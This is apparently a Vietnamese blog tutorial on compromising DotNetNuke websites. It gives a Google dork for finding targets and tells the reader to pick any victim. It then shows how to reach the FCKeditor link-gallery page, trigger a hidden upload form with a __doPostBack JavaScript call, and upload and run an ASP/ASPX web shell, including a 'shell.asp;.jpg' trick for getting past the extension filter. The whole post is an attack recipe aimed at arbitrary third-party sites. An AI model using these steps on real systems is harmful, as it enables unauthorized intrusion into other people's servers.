Bước 1: Sử dụng google để tìm site chứa lỗ
hổng DNN
:inurl:/tabid/36/language/en-US/Default.aspxInurl:”/portals/0”
Bước 2: Chọn 1 victim bất kỳ, ví dụ:
Bước 3: Thay thế đoạn url
sau:
/tabid/36/language/en-US/Default.aspx
Bằng đoạn mã url:
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
Lúc đó, đường link của victim
như sau:
Thông tin thu được:
Bước 4: Tích vào File (A File on your site)
Sau đó thay thế đường link bằng đoạn mã Script đơn giản sau:
javascript:__doPostBack('ctlURL$cmdUpload','')
Sau khi chạy địa chỉ url ở trên sẽ xuất hiện giao diện cho upload file
Bước 5: Upload
shell
Click Browse và upload shell
.asp or. aspx
Thêm 1 số kỹ thuật
upload shell đối với asp,
- Có thể bypass đuôi
file shell sang dạng ảnh như sau: shell.asp;.jpg.
- Hoặc sử dụng
tool http live herder or tamper data….
Bước 6: Run
shell
Một số site dính DNN:
0 nhận xét:
Đăng nhận xét